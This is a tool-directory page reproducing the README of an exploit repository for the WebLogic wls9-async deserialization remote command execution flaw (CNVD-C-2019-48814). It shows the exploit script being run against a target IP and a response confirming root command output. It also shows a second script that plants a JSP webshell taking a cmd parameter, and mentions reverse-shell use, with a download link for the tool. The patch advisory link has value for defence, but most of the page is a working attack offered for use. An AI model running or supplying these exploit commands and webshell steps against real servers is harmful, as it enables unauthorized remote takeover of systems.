Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CNVD-C-2019-48814 — WebLogic wls9-async反序列化远程命令执行漏洞 | Kitploit
Tools/GitHubGitHub/jas502n/cnvd-c-2019-48814
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjas502n/cnvd-c-2019-48814

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

View Repository
239917 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CNVD-C-2019-48814

WebLogic wls9-async Deserialization Remote Command Execution Vulnerability

Echo PoC for WebLogic

Patch update:

root@kitploit:~

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

Vulnerability Reproduction:

root@kitploit:~
http://10.10.20.166:7001/_async/AsyncResponseService
root@kitploit:~
curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 Video

CNVD-C-2019-48814

root@kitploit:~
python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

Use RMI

CVE-2017-10271 No pactch

windows-linux-webshell

root@kitploit:~
upadte: 自定义webshell名字,适用于windows or linux upload webshell

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

resever_shell

command see

webshell

Download Tool